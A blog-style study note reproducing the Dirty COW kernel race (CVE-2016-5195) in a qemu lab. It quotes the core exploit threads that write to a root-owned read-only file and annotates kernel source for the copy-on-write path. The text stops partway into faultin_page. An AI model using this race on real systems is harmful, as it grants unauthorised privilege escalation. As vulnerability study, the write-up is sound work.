CVE-2016-5195-Dirtycow

Preface

I had long wanted to study Linux kernel internals but never got started. By chance I found a very detailed Dirty COW reproduction post on Kanxue, "linux內核提权漏洞CVE-2016-5195", and since I had always heard about the Dirty COW privilege-escalation bug, I took the opportunity to follow along, reproduce it, and dig into the kernel to shore up my shaky fundamentals. Because I had barely touched kernel code before, I kept detailed notes for future reference.

Environment Setup

The environment is qemu + busybox + linux-4.4.1, built mainly by following two articles: 搭建Linux kernel调试环境 and QEMU + Busybox 模拟 Linux 内核环境.

Those two articles already explain the setup in detail, so I won't repeat it here.

What follows is mainly a record of the problems I ran into while setting things up:

  • To run the Dirty COW exploit, after building busybox you need to mount the appropriate file system, otherwise the exploit won't run; a file system from a CTF kernel challenge works fine here.
  • When launching qemu, set the CPU count to 1 with -smp cores=1,threads=1 to make debugging easier; otherwise you may get bounced to another process halfway through a debugging session.
  • Kernel compiler optimizations make debugging awkward because the code jumps around. Simply changing -O2 to -O0 in the top-level Makefile breaks the build, since parts of the kernel depend on compiler optimization. The workaround I found is "Is it possible to turn off the gcc optimization when compiling kernel?": locate the module you want to debug and edit that directory's Makefile. For example, to disable optimization for the kernel's read_write code, add CFLAGS_read_write.o = -O0 to the Makefile and rebuild, or put __attribute__((optimize("O0"))) in front of the function, as sketched below.
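
A minimal sketch of the two options (the function shown is only an illustration, not a real kernel function):

/* Option 1 - in the module's Makefile, deoptimize one object file:
 *     CFLAGS_read_write.o = -O0
 *
 * Option 2 - deoptimize a single function with a GCC attribute:
 */
__attribute__((optimize("O0")))
static ssize_t my_traced_helper(void)   /* hypothetical function */
{
	/* this body is compiled at -O0; the rest of the file is unchanged */
	return 0;
}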

Debug Environment

  • ubuntu 16.04
  • Linux-4.4.1
  • qemu-system-x86_64 2.5.0
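
With these versions, a launch command along the following lines works (a sketch from my notes; the bzImage and rootfs paths are assumptions about your build layout):

qemu-system-x86_64 \
    -kernel ./linux-4.4.1/arch/x86/boot/bzImage \
    -initrd ./rootfs.img \
    -append "console=ttyS0 nokaslr" \
    -smp cores=1,threads=1 \
    -nographic \
    -s    # shorthand for -gdb tcp::1234, so gdb can attach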

Verifying the Vulnerability

The file foo is a read-only file owned by root, yet with the Dirty COW bug the data 1111 can be written into it:
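
Roughly, the session looks like this (illustrative transcript; addresses and counters elided — compare the usage example at the top of the full PoC at the end of this post):

# echo 'this is a test' > foo
# chmod 0404 foo
$ cat foo
this is a test
$ ./dirtyc0w foo 1111
mmap ...
madvise 0
procselfmem ...
$ cat foo
1111 is a test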


Vulnerability Analysis

Taking the PoC as the entry point, let's analyze the root cause of the vulnerability.

The PoC first defines two threads and the work each performs. One of them is madviseThread, which calls madvise in a tight loop; the MADV_DONTNEED flag tells the kernel that the memory at the address map will not be accessed in the near future, so this thread's concrete job is to keep discarding the page(s) backing map.

void *madviseThread(void *arg)
{
	char *str;
	str = (char *)arg;
	int i, c = 0;
	for (i = 0; i < 100000000; i++)
	{
		c += madvise(map, 100, MADV_DONTNEED);
	}
	printf("madvise %d\n\n", c);
}

The other thread runs procselfmemThread, which opens the process's own memory through /proc/self/mem, seeks to the address map, and keeps writing data there.

void *procselfmemThread(void *arg)
{
	char *str;
	str = (char *)arg;

	int f = open("/proc/self/mem", O_RDWR);
	int i, c = 0;
	for (i = 0; i < 100000000; i++) {
		lseek(f, (uintptr_t) map, SEEK_SET);
		c += write(f, str, strlen(str));
	}
	printf("procselfmem %d\n\n", c);
}

Finally the PoC takes the target read-only file: it opens the file read-only, maps it into the process address space with mmap, and then runs the two threads above — one continually discarding the page behind map, the other continually writing to map. If the race hits at the right moment, the malicious data ends up written into the read-only file.

...
f=open(argv[1],O_RDONLY);
fstat(f,&st);
name=argv[1];
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %zx\n\n",(uintptr_t) map);
...

mmap only sets up the mapping of the file into the process; the virtual-to-physical translation is not established yet, so the first write to that address triggers a page fault. The whole fault is handled by the kernel functions follow_page_mask and faultin_page; the flow is as follows.

(1) On the first entry into follow_page_mask, no physical page has been established yet, so it returns straight through no_page_table:


(2) Since no matching page table entry was found, we enter the page-fault handling path to set up the physical page:


(3) faultin_page handles the fault. Because the access is a write (the operation performed by procselfmemThread) while the process mapped the file read-only, the kernel marks the fault with FAULT_FLAG_WRITE. This flag is the crux of the vulnerability:


(4) Next comes handle_mm_fault, which produces the physical page backing the memory and returns it so that the user's write can proceed:


(5) Inside handle_mm_fault there is a three-way choice between do_read_fault, do_cow_fault, and do_shared_fault. The PoC maps the file without the shared mode, so the do_shared_fault path is out. How does the kernel pick between do_read_fault and do_cow_fault? This is where copy-on-write comes in. If the process only reads the memory, the kernel hands back the physical page backing the file directly. If the process intends to write, the original physical page must not be disturbed, so the kernel copies it and gives the process the copy; the process can then scribble on the copy freely without affecting the original page. And how does the kernel decide whether the process intends to write? As the code shows, it comes down to the FAULT_FLAG_WRITE flag.
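
The user-visible half of this behavior is easy to demonstrate from user space. The following standalone sketch (not part of the PoC; the file name demo.txt is arbitrary) shows that a write through a MAP_PRIVATE mapping lands in a private copy and never reaches the file:

#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
	int fd = open("demo.txt", O_RDWR | O_CREAT | O_TRUNC, 0644);
	write(fd, "hello", 5);

	/* MAP_PRIVATE: the first write faults into do_cow_fault(), which
	 * copies the page-cache page into a private anonymous page. */
	char *p = mmap(NULL, 5, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
	if (p == MAP_FAILED)
		return 1;
	p[0] = 'H';                       /* modifies only the private copy */

	char buf[6] = {0};
	pread(fd, buf, 5, 0);             /* re-read the file itself */
	printf("mapping: %.5s, file: %s\n", p, buf);  /* "Hello", "hello" */

	munmap(p, 5);
	close(fd);
	return 0;
}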


(6) Back in handle_mm_fault: after the steps above it has produced a physical page for the process to write to, but the returned page does not carry write permission, so the page lookup still comes back empty (returns 0):


(7) follow_page_mask is therefore entered a second time. The process still wants to write to the page, but the page that was just mapped is not writable, so faultin_page must be entered once more:


(8) After the second faultin_page, handle_mm_fault returns a writable physical page:


(9) Since a writable physical page has now been produced, the FOLL_WRITE flag can be cleared. This is exactly the moment the exploit's race wants to hit:


(10) follow_page_mask is entered a third time, and this time it finally obtains the physical page address:


To summarize the fault flow: it takes three passes through follow_page_mask and two through faultin_page:

  • The first follow_page_mask cannot find a physical page for the address, so faultin_page is entered to handle the fault.

  • The first faultin_page establishes the physical page backing the address, but the page has no write permission.

  • The second follow_page_mask returns NULL because the page is not writable.

  • The second faultin_page produces a writable page and clears the FOLL_WRITE flag.

  • The third follow_page_mask obtains the writable physical page, and the operation proceeds — see the condensed sketch of the driving loop just below.
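
Condensed, the loop in __get_user_pages (shown in full in the source walkthrough below) that produces this three-pass sequence looks like:

/* simplified sketch of mm/gup.c, __get_user_pages() */
retry:
	page = follow_page_mask(vma, start, foll_flags, &page_mask);
	if (!page) {
		/* pass 1: no PTE yet -> do_cow_fault() maps a private copy
		 * pass 2: PTE present but read-only while FOLL_WRITE is set
		 *         -> follow_page_pte() returned NULL;
		 *            faultin_page() now clears FOLL_WRITE           */
		ret = faultin_page(tsk, vma, start, &foll_flags, nonblocking);
		if (ret == 0)
			goto retry;     /* pass 3: the page is finally returned */
		/* ... error handling elided ... */
	}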

The Bug

If, right when the second faultin_page clears FOLL_WRITE, the madviseThread happens to run, the freshly established mapping is thrown away. The flow then re-enters follow_page_mask, finds no physical page, and calls faultin_page again — but FOLL_WRITE is gone, so the kernel believes the process has no intention of writing and takes the do_read_fault path, which maps the read-only file's original physical page directly. All subsequent writes land on that page, and the read-only file gets modified. The timeline below lays out the interleaving.
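
Laid out as a timeline (schematic only, not runnable code), the fatal interleaving is:

/*
 * write thread (/proc/self/mem)              madvise thread
 * ---------------------------------------    --------------------------
 * follow_page_mask() -> no page
 * faultin_page() -> do_cow_fault():
 *   private COW copy mapped (read-only)
 * follow_page_mask() -> NULL
 *   (FOLL_WRITE set, PTE not writable)
 * faultin_page() -> clears FOLL_WRITE
 *                                            madvise(MADV_DONTNEED)
 *                                              drops the COW mapping
 * follow_page_mask() -> no page again
 * faultin_page() -> FOLL_WRITE is gone, so
 *   do_read_fault() maps the ORIGINAL
 *   page-cache page of the read-only file
 * follow_page_mask() -> returns that page
 * __access_remote_vm() writes into it  =>  the file itself is modified
 */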

Source Code Walkthrough

  • The sys_write function is, in essence, the kernel's SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf, size_t, count).

linux-4.4.1/include/linux/syscalls.h:182

#ifdef CONFIG_FTRACE_SYSCALLS
...
#else
#define SYSCALL_METADATA(sname, nb, ...)
#endif

#define SYSCALL_DEFINE0(sname) \ // syscall taking no arguments
	SYSCALL_METADATA(_##sname, 0); \
	asmlinkage long sys_##sname(void)
#define SYSCALL_DEFINE1(name, ...) SYSCALL_DEFINEx(1, _##name, __VA_ARGS__) // one-argument syscall
#define SYSCALL_DEFINE2(name, ...) SYSCALL_DEFINEx(2, _##name, __VA_ARGS__) // two-argument syscall
#define SYSCALL_DEFINE3(name, ...) SYSCALL_DEFINEx(3, _##name, __VA_ARGS__) // three-argument syscall
#define SYSCALL_DEFINE4(name, ...) SYSCALL_DEFINEx(4, _##name, __VA_ARGS__) // four-argument syscall
#define SYSCALL_DEFINE5(name, ...) SYSCALL_DEFINEx(5, _##name, __VA_ARGS__) // five-argument syscall
#define SYSCALL_DEFINE6(name, ...) SYSCALL_DEFINEx(6, _##name, __VA_ARGS__) // six-argument syscall

#define SYSCALL_DEFINEx(x, sname, ...) \
	SYSCALL_METADATA(sname, x, __VA_ARGS__) \ // expands to nothing when CONFIG_FTRACE_SYSCALLS is not defined
	__SYSCALL_DEFINEx(x, sname, __VA_ARGS__) // the trailing ... is substituted via __VA_ARGS__

#define __PROTECT(...) asmlinkage_protect(__VA_ARGS__) // asmlinkage_protect(...) expands to do { } while (0)
#define __SYSCALL_DEFINEx(x, name, ...) \
	asmlinkage long sys##name(__MAP(x,__SC_DECL,__VA_ARGS__)) \
		__attribute__((alias(__stringify(SyS##name)))); \ // set an alias: sys_write is the same symbol as SyS_write
	static inline long SYSC##name(__MAP(x,__SC_DECL,__VA_ARGS__)); \ // __MAP() stitches the parameters together
	asmlinkage long SyS##name(__MAP(x,__SC_LONG,__VA_ARGS__)); \
	asmlinkage long SyS##name(__MAP(x,__SC_LONG,__VA_ARGS__)) \ // SyS_write internally calls SYSC_write
	{ \
		long ret = SYSC##name(__MAP(x,__SC_CAST,__VA_ARGS__)); \
		__MAP(x,__SC_TEST,__VA_ARGS__); \
		__PROTECT(x, ret,__MAP(x,__SC_ARGS,__VA_ARGS__)); \
		return ret; \
	} \
	static inline long SYSC##name(__MAP(x,__SC_DECL,__VA_ARGS__))

linux-4.4.1/include/linux/syscalls.h:92

#define __MAP0(m,...)
#define __MAP1(m,t,a) m(t,a)
#define __MAP2(m,t,a,...) m(t,a), __MAP1(m,__VA_ARGS__)
#define __MAP3(m,t,a,...) m(t,a), __MAP2(m,__VA_ARGS__)
#define __MAP4(m,t,a,...) m(t,a), __MAP3(m,__VA_ARGS__)
#define __MAP5(m,t,a,...) m(t,a), __MAP4(m,__VA_ARGS__)
#define __MAP6(m,t,a,...) m(t,a), __MAP5(m,__VA_ARGS__)
#define __MAP(n,...) __MAP##n(__VA_ARGS__) // n is the number of parameters

#define __SC_DECL(t, a) t a // concatenates type and name: __SC_DECL(int, x) -> int x
#define __TYPE_IS_L(t) (__same_type((t)0, 0L))
#define __TYPE_IS_UL(t) (__same_type((t)0, 0UL))
#define __TYPE_IS_LL(t) (__same_type((t)0, 0LL) || __same_type((t)0, 0ULL))
#define __SC_LONG(t, a) __typeof(__builtin_choose_expr(__TYPE_IS_LL(t), 0LL, 0L)) a
#define __SC_CAST(t, a) (t) a
#define __SC_ARGS(t, a) a
#define __SC_TEST(t, a) (void)BUILD_BUG_ON_ZERO(!__TYPE_IS_LL(t) && sizeof(t) > sizeof(long))

linux-4.4.1/include/linux/stringify.h

#ifndef __LINUX_STRINGIFY_H
#define __LINUX_STRINGIFY_H

/* Indirect stringification. Doing two levels allows the parameter to be a
* macro itself. For example, compile with -DFOO=bar, __stringify(FOO)
* converts to "bar".
*/

#define __stringify_1(x...) #x
#define __stringify(x...) __stringify_1(x) //__stringify(a) = "a"

#endif /* !__LINUX_STRINGIFY_H */

linux-4.4.1/include/linux/linkage.h

#ifndef __ASSEMBLY__
#ifndef asmlinkage_protect
# define asmlinkage_protect(n, ret, args...) do { } while (0)
#endif
#endif

Given the kernel code above, the macro expansion of SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf, size_t, count) proceeds as follows:

SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf, size_t, count)
-->
SYSCALL_DEFINEx(3, _write, unsigned int, fd, const char __user *, buf, size_t, count)
-->
asmlinkage long sys_write(unsigned int fd, const char __user *buf, size_t count)
	__attribute__((alias("SyS_write"))); // sys_write is aliased to SyS_write
static inline long SYSC_write(unsigned int fd, const char __user *buf, size_t count);
asmlinkage long SyS_write(long fd, long buf, long count); // __SC_LONG widens each argument to long
asmlinkage long SyS_write(long fd, long buf, long count)
{
	long ret = SYSC_write((unsigned int) fd, (const char __user *) buf, (size_t) count);
	(void)BUILD_BUG_ON_ZERO(!__TYPE_IS_LL(unsigned int) && sizeof(unsigned int) > sizeof(long));
	(void)BUILD_BUG_ON_ZERO(!__TYPE_IS_LL(const char __user *) && sizeof(const char __user *) > sizeof(long));
	(void)BUILD_BUG_ON_ZERO(!__TYPE_IS_LL(size_t) && sizeof(size_t) > sizeof(long));
	do { } while (0);
	return ret;
}
static inline long SYSC_write(unsigned int fd, const char __user *buf, size_t count)

So after compilation, SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf, size_t, count) yields sys_write(unsigned int fd, const char __user *buf, size_t count).

Call chain of sys_write:

entry_SYSCALL_64(arch/x86/entry/entry_64.S:185)
->
SyS_write(fs/read_write.c:577)
->
SYSC_write(fs/read_write.c:585)
->
vfs_write(fs/read_write.c:538)
->
__vfs_write(fs/read_write.c:489)
->
mem_write(fs/proc/base.c:908)
->
mem_rw(fs/proc/base.c:908)
->
access_remote_vm(mm/memory.c:3722)
->
__access_remote_vm(mm/memory.c:3662)
->
get_user_pages(mm/gup.c:859)
->
__get_user_pages_locked(mm/gup.c:651)
->
__get_user_pages(mm/gup.c:457)
->
follow_page_mask(mm/gup.c:180) and faultin_page(mm/gup.c:303)
->
handle_mm_fault(mm/memory.c:3424)
->
__handle_mm_fault(mm/memory.c:3339)
->
handle_pte_fault(mm/memory.c:3287)

SyS_write

SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
		size_t, count)
{
	struct fd f = fdget_pos(fd); // look up the file from the file descriptor
	ssize_t ret = -EBADF; // #define EBADF 9 /* Bad file number */

	if (f.file) {
		loff_t pos = file_pos_read(f.file); // loff_t is long long; read the current file position
		ret = vfs_write(f.file, buf, count, &pos); // write count bytes from buf starting at pos
		if (ret >= 0)
			file_pos_write(f.file, pos);
		fdput_pos(f);
	}

	return ret;
}

vfs_write

ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
	ssize_t ret;

	if (!(file->f_mode & FMODE_WRITE)) // was the file opened for writing?
		return -EBADF;
	if (!(file->f_mode & FMODE_CAN_WRITE)) // does it have a write method?
		return -EINVAL; // #define EINVAL 22 /* Invalid argument */
	if (unlikely(!access_ok(VERIFY_READ, buf, count))) // the buffer must lie within user space, i.e. below 0x7ffffffff000
		return -EFAULT; // #define EFAULT 14 /* Bad address */

	ret = rw_verify_area(WRITE, file, pos, count); // may this region be written?
	if (ret >= 0) {
		count = ret;
		file_start_write(file);
		ret = __vfs_write(file, buf, count, pos);
		if (ret > 0) {
			fsnotify_modify(file);
			add_wchar(current, ret);
		}
		inc_syscw(current);
		file_end_write(file);
	}

	return ret;
}

__vfs_write

ssize_t __vfs_write(struct file *file, const char __user *p, size_t count,
		    loff_t *pos)
{
	if (file->f_op->write)
		return file->f_op->write(file, p, count, pos); // dispatch on the file's own write method; for /proc/self/mem this is mem_write
	else if (file->f_op->write_iter)
		return new_sync_write(file, p, count, pos);
	else
		return -EINVAL;
}

mem_write

static ssize_t mem_write(struct file *file, const char __user *buf,
			 size_t count, loff_t *ppos)
{
	return mem_rw(file, (char __user *)buf, count, ppos, 1); // mem_write is just a wrapper around mem_rw
}

mem_rw

static ssize_t mem_rw(struct file *file, char __user *buf,
		      size_t count, loff_t *ppos, int write)
{
	struct mm_struct *mm = file->private_data; // the target task's mm, stashed in private_data
	unsigned long addr = *ppos; // the file offset is the target address
	ssize_t copied;
	char *page;

	if (!mm)
		return 0;

	page = (char *)__get_free_page(GFP_TEMPORARY); // grab a free page as a bounce buffer
	if (!page)
		return -ENOMEM;

	copied = 0;
	if (!atomic_inc_not_zero(&mm->mm_users))
		goto free;

	while (count > 0) {
		int this_len = min_t(int, count, PAGE_SIZE); // the smaller of count and PAGE_SIZE

		if (write && copy_from_user(page, buf, this_len)) { // first copy the user buffer into the bounce page
			copied = -EFAULT;
			break;
		}

		this_len = access_remote_vm(mm, addr, page, this_len, write); // the cross-address-space write
		if (!this_len) {
			if (!copied)
				copied = -EIO;
			break;
		}

		if (!write && copy_to_user(buf, page, this_len)) {
			copied = -EFAULT;
			break;
		}

		buf += this_len;
		addr += this_len;
		copied += this_len;
		count -= this_len;
	}
	*ppos = addr;

	mmput(mm);
free:
	free_page((unsigned long) page);
	return copied;
}

access_remote_vm

int access_remote_vm(struct mm_struct *mm, unsigned long addr,
		     void *buf, int len, int write)
{
	/*
	 * Called as access_remote_vm(mm, addr, page, this_len, write):
	 * buf is the bounce page, addr the target address.
	 */
	return __access_remote_vm(NULL, mm, addr, buf, len, write); // thin wrapper around __access_remote_vm
}

__access_remote_vm

static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long addr, void *buf, int len, int write)
{
	/*
	 * tsk = NULL, mm = file->private_data, addr = target address,
	 * buf = bounce page, len = this_len, write = write flag
	 */
	struct vm_area_struct *vma; // the VMA describing the virtual region
	void *old_buf = buf; // old_buf = bounce page

	down_read(&mm->mmap_sem);
	/* ignore errors, just check how much was successfully transferred */
	while (len) {
		int bytes, ret, offset;
		void *maddr;
		struct page *page = NULL;

		/*
		 * get_user_pages(tsk = NULL, mm = file->private_data,
		 *                start = addr, nr_pages = 1,
		 *                write = write, force = 1,
		 *                pages = &page, vmas = &vma)
		 */
		ret = get_user_pages(tsk, mm, addr, 1,
				write, 1, &page, &vma); // fetch the physical page to write; the bug lives down this path: if the file's real page-cache page is handed back, we get an arbitrary file write
		if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
			break;
#else
			/*
			 * Check if this is a VM_IO | VM_PFNMAP VMA, which
			 * we can access using slightly different code.
			 */
			vma = find_vma(mm, addr);
			if (!vma || vma->vm_start > addr)
				break;
			if (vma->vm_ops && vma->vm_ops->access)
				ret = vma->vm_ops->access(vma, addr, buf,
							  len, write);
			if (ret <= 0)
				break;
			bytes = ret;
#endif
		} else {
			bytes = len;
			offset = addr & (PAGE_SIZE-1);
			if (bytes > PAGE_SIZE-offset)
				bytes = PAGE_SIZE-offset;

			maddr = kmap(page); // map the (possibly highmem) page frame into the kernel address space
			if (write) { // writing:
				copy_to_user_page(vma, page, addr,
						  maddr + offset, buf, bytes); // copy the bounce page's contents into the page just obtained
				set_page_dirty_lock(page);
			} else {
				copy_from_user_page(vma, page, addr,
						    buf, maddr + offset, bytes);
			}
			kunmap(page); // unmap the page again
			page_cache_release(page);
		}
		len -= bytes;
		buf += bytes;
		addr += bytes;
	}
	up_read(&mm->mmap_sem);

	return buf - old_buf;
}

get_user_pages

long get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages, int write,
		int force, struct page **pages, struct vm_area_struct **vmas)
{
	return __get_user_pages_locked(tsk, mm, start, nr_pages, write, force,
				       pages, vmas, NULL, false, FOLL_TOUCH); // thin wrapper around __get_user_pages_locked
}

__get_user_pages_locked

static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
						struct mm_struct *mm,
						unsigned long start,
						unsigned long nr_pages,
						int write, int force,
						struct page **pages,
						struct vm_area_struct **vmas,
						int *locked, bool notify_drop,
						unsigned int flags)
{
	/*
	 * Called as __get_user_pages_locked(tsk, mm, start, nr_pages, write,
	 * force, pages, vmas, NULL, false, FOLL_TOUCH) with:
	 * tsk = NULL, mm = file->private_data, start = addr, nr_pages = 1,
	 * write = write, force = 1, pages = &page, vmas = &vma,
	 * locked = NULL, notify_drop = false, flags = FOLL_TOUCH
	 */
	long ret, pages_done;
	bool lock_dropped;

	if (locked) {
		/* if VM_FAULT_RETRY can be returned, vmas become invalid */
		BUG_ON(vmas);
		/* check caller initialized locked */
		BUG_ON(*locked != 1);
	}

	if (pages)
		flags |= FOLL_GET; // the caller wants the struct pages
	if (write)
		flags |= FOLL_WRITE; // a writable PTE is wanted
	if (force)
		flags |= FOLL_FORCE; // force read/write access (ptrace-style)

	pages_done = 0;
	lock_dropped = false;
	for (;;) {
		ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
				       vmas, locked);
		if (!locked)
			/* VM_FAULT_RETRY couldn't trigger, bypass */
			return ret; // return immediately (locked == NULL in our case)

		/* VM_FAULT_RETRY cannot return errors */
		if (!*locked) {
			BUG_ON(ret < 0);
			BUG_ON(ret >= nr_pages);
		}

		if (!pages)
			/* If it's a prefault don't insist harder */
			return ret;

		if (ret > 0) {
			nr_pages -= ret;
			pages_done += ret;
			if (!nr_pages)
				break;
		}
		if (*locked) {
			/* VM_FAULT_RETRY didn't trigger */
			if (!pages_done)
				pages_done = ret;
			break;
		}
		/* VM_FAULT_RETRY triggered, so seek to the faulting offset */
		pages += ret;
		start += ret << PAGE_SHIFT;

		/*
		 * Repeat on the address that fired VM_FAULT_RETRY
		 * without FAULT_FLAG_ALLOW_RETRY but with
		 * FAULT_FLAG_TRIED.
		 */
		*locked = 1;
		lock_dropped = true;
		down_read(&mm->mmap_sem);
		ret = __get_user_pages(tsk, mm, start, 1, flags | FOLL_TRIED,
				       pages, NULL, NULL);
		if (ret != 1) {
			BUG_ON(ret > 1);
			if (!pages_done)
				pages_done = ret;
			break;
		}
		nr_pages--;
		pages_done++;
		if (!nr_pages)
			break;
		pages++;
		start += PAGE_SIZE;
	}
	if (notify_drop && lock_dropped && *locked) {
		/*
		 * We must let the caller know we temporarily dropped the lock
		 * and so the critical section protected by it was lost.
		 */
		up_read(&mm->mmap_sem);
		*locked = 0;
	}
	return pages_done;
}

__get_user_pages

...
retry:
		/*
		 * If we have a pending SIGKILL, don't keep faulting pages and
		 * potentially allocating memory.
		 */
		if (unlikely(fatal_signal_pending(current))) // bail out on a fatal signal
			return i ? i : -ERESTARTSYS;
		cond_resched(); // be nice: give the scheduler a chance to run

		/*
		 * First pass: follow_page_mask() returns 0 because no page
		 * table has been set up, so we drop into faultin_page()
		 * (foll_flags == 0x17, nonblocking == 0), which goes:
		 *   handle_mm_fault()       fault_flags == 1
		 *   -> __handle_mm_fault()  the pte is allocated here but not
		 *                           yet mapped to a physical page
		 *   -> handle_pte_fault()   map the pte to a physical page
		 *   -> do_fault()           handle the file-backed fault
		 *   -> do_cow_fault()       copy-on-write handling
		 *   -> __do_fault()
		 */
		page = follow_page_mask(vma, start, foll_flags, &page_mask); // look up the page
		if (!page) {
			int ret;
			ret = faultin_page(tsk, vma, start, &foll_flags, // fault it in
					   nonblocking);
			switch (ret) {
			case 0:
				goto retry;
			case -EFAULT:
			case -ENOMEM:
			case -EHWPOISON:
				return i ? i : ret;
			case -EBUSY:
				return i;
			case -ENOENT:
				goto next_page;
			}
			BUG();
		} else if (PTR_ERR(page) == -EEXIST) {
			/*
			 * Proper page table entry exists, but no corresponding
			 * struct page.
			 */
			goto next_page;
		} else if (IS_ERR(page)) {
			return i ? i : PTR_ERR(page);
		}
		if (pages) {
			pages[i] = page;
			flush_anon_page(vma, page, start);
			flush_dcache_page(page);
			page_mask = 0;
		}
next_page:
		if (vmas) {
			vmas[i] = vma;
			page_mask = 0;
		}
		page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
		if (page_increm > nr_pages)
			page_increm = nr_pages;
		i += page_increm;
		start += page_increm * PAGE_SIZE;
		nr_pages -= page_increm;
	} while (nr_pages);
	return i;
}

follow_page_mask

struct page *follow_page_mask(struct vm_area_struct *vma,
			      unsigned long address, unsigned int flags,
			      unsigned int *page_mask)
{
	/* walk the page tables for a virtual address: pgd -> pud -> pmd -> pte */
	pgd_t *pgd;
	pud_t *pud;
	pmd_t *pmd;
	spinlock_t *ptl;
	struct page *page;
	struct mm_struct *mm = vma->vm_mm;

	*page_mask = 0;

	page = follow_huge_addr(mm, address, flags & FOLL_WRITE); // is this a huge-page address?
	if (!IS_ERR(page)) {
		BUG_ON(flags & FOLL_GET);
		return page;
	}

	pgd = pgd_offset(mm, address); // locate the pgd entry
	if (pgd_none(*pgd) || unlikely(pgd_bad(*pgd)))
		return no_page_table(vma, flags);
	/*
	 * x86-64 virtual address layout:
	 * | pgd 9 bits | pud 9 bits | pmd 9 bits | pte 9 bits | offset 12 bits |
	 */
	pud = pud_offset(pgd, address); // locate the pud entry
	if (pud_none(*pud)) // empty?
		return no_page_table(vma, flags);
	if (pud_huge(*pud) && vma->vm_flags & VM_HUGETLB) { // huge-page pud?
		page = follow_huge_pud(mm, address, pud, flags);
		if (page)
			return page;
		return no_page_table(vma, flags);
	}
	if (unlikely(pud_bad(*pud)))
		return no_page_table(vma, flags);

	pmd = pmd_offset(pud, address); // locate the pmd entry
	if (pmd_none(*pmd))
		return no_page_table(vma, flags);
	if (pmd_huge(*pmd) && vma->vm_flags & VM_HUGETLB) {
		page = follow_huge_pmd(mm, address, pmd, flags);
		if (page)
			return page;
		return no_page_table(vma, flags);
	}
	if ((flags & FOLL_NUMA) && pmd_protnone(*pmd))
		return no_page_table(vma, flags);
	if (pmd_trans_huge(*pmd)) { // transparent huge page: possibly split it
		if (flags & FOLL_SPLIT) {
			split_huge_page_pmd(vma, address, pmd);
			return follow_page_pte(vma, address, pmd, flags);
		}
		ptl = pmd_lock(mm, pmd); // take the pmd lock
		if (likely(pmd_trans_huge(*pmd))) {
			if (unlikely(pmd_trans_splitting(*pmd))) {
				spin_unlock(ptl);
				wait_split_huge_page(vma->anon_vma, pmd);
			} else {
				page = follow_trans_huge_pmd(vma, address,
							     pmd, flags);
				spin_unlock(ptl);
				*page_mask = HPAGE_PMD_NR - 1;
				return page;
			}
		} else
			spin_unlock(ptl);
	}
	return follow_page_pte(vma, address, pmd, flags);
}

follow_page_pte

static struct page *follow_page_pte(struct vm_area_struct *vma,
		unsigned long address, pmd_t *pmd, unsigned int flags)
{
	struct mm_struct *mm = vma->vm_mm;
	struct page *page;
	spinlock_t *ptl;
	pte_t *ptep, pte;

retry:
	if (unlikely(pmd_bad(*pmd))) // sanity-check the pmd
		return no_page_table(vma, flags);

	ptep = pte_offset_map_lock(mm, pmd, address, &ptl); // map and lock the pte
	pte = *ptep;
	if (!pte_present(pte)) { // pte not present?
		swp_entry_t entry;
		/*
		 * KSM's break_ksm() relies upon recognizing a ksm page
		 * even while it is being migrated, so for that case we
		 * need migration_entry_wait().
		 */
		if (likely(!(flags & FOLL_MIGRATION)))
			goto no_page;
		if (pte_none(pte))
			goto no_page;
		entry = pte_to_swp_entry(pte);
		if (!is_migration_entry(entry))
			goto no_page;
		pte_unmap_unlock(ptep, ptl);
		migration_entry_wait(mm, pmd, address);
		goto retry;
	}
	if ((flags & FOLL_NUMA) && pte_protnone(pte))
		goto no_page;
	if ((flags & FOLL_WRITE) && !pte_write(pte)) { // a write is wanted but the pte is read-only: return NULL so the caller faults
		pte_unmap_unlock(ptep, ptl);
		return NULL;
	}

	page = vm_normal_page(vma, address, pte); // resolve the physical page from address and pte
	if (unlikely(!page)) {
		if (flags & FOLL_DUMP) {
			/* Avoid special (like zero) pages in core dumps */
			page = ERR_PTR(-EFAULT);
			goto out;
		}

		if (is_zero_pfn(pte_pfn(pte))) {
			page = pte_page(pte);
		} else {
			int ret;

			ret = follow_pfn_pte(vma, address, ptep, flags);
			page = ERR_PTR(ret);
			goto out;
		}
	}

	if (flags & FOLL_GET)
		get_page_foll(page);
	if (flags & FOLL_TOUCH) {
		if ((flags & FOLL_WRITE) &&
		    !pte_dirty(pte) && !PageDirty(page))
			set_page_dirty(page);
		/*
		 * pte_mkyoung() would be more correct here, but atomic care
		 * is needed to avoid losing the dirty bit: it is easier to use
		 * mark_page_accessed().
		 */
		mark_page_accessed(page); // mark the page as accessed
	}
	if ((flags & FOLL_MLOCK) && (vma->vm_flags & VM_LOCKED)) {
		/*
		 * The preliminary mapping check is mainly to avoid the
		 * pointless overhead of lock_page on the ZERO_PAGE
		 * which might bounce very badly if there is contention.
		 *
		 * If the page is already locked, we don't need to
		 * handle it now - vmscan will handle it later if and
		 * when it attempts to reclaim the page.
		 */
		if (page->mapping && trylock_page(page)) {
			lru_add_drain(); /* push cached pages to LRU */
			/*
			 * Because we lock page here, and migration is
			 * blocked by the pte's page reference, and we
			 * know the page is still mapped, we don't even
			 * need to check for file-cache page truncation.
			 */
			mlock_vma_page(page);
			unlock_page(page);
		}
	}
out:
	pte_unmap_unlock(ptep, ptl);
	return page; // hand the physical page back
no_page:
	pte_unmap_unlock(ptep, ptl);
	if (!pte_none(pte))
		return NULL;
	return no_page_table(vma, flags);
}

faultin_page

static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
		unsigned long address, unsigned int *flags, int *nonblocking)
{
	struct mm_struct *mm = vma->vm_mm;
	unsigned int fault_flags = 0;
